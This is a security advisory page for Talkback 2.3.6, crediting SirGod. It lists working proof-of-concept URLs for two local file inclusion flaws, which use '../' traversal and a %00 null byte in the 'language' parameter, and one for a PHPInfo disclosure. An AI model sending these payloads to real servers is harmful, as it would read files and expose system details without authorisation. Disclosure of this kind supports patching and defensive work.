Bug: Talkback 2.3.6 Multiple Local File Inclusion/PHPInfo Disclosure Vulns ( Ascii Version )

Search:
WLB2

Talkback 2.3.6 Multiple Local File Inclusion/PHPInfo Disclosure Vulns

Published
Credit
Risk
2008.09.19
SirGod
Medium
CWE
CVE
Local
Remote
CWE-200
CVE-2008-4115
CVE-2008-4346
No
Yes

############################################################################################################
[+] Talkback 2.3.6 Multiple Local File Inclusion/PHPInfo Disclosure
[+] Discovered By SirGod
[+] MorTal TeaM
[+] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,HrN,kemrayz,007m,Raven,Nytr0gen,str0ke
############################################################################################################

[+] Local File Inclusion


PoC 1 :

http://[target]/[path]/comments.php?language=[Local File]%00

Example 1 :

http://127.0.0.1/talkback/comments.php?language=../../../../autoexec.bat%00


PoC 2 :

http://[target]/[path]/install/help.php?language=[Local File]%00

Example 2 :

http://127.0.0.1/talkback/install/help.php?language=../../../../../autoexec.bat%00



[+] PHPInfo Disclosure


PoC:

http://[target]/[path]/install/info.php

Example :

http://127.0.0.1/talkback/install/info.php


##############################################################################################################

References:

http://www.milw0rm.com/exploits/6451

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version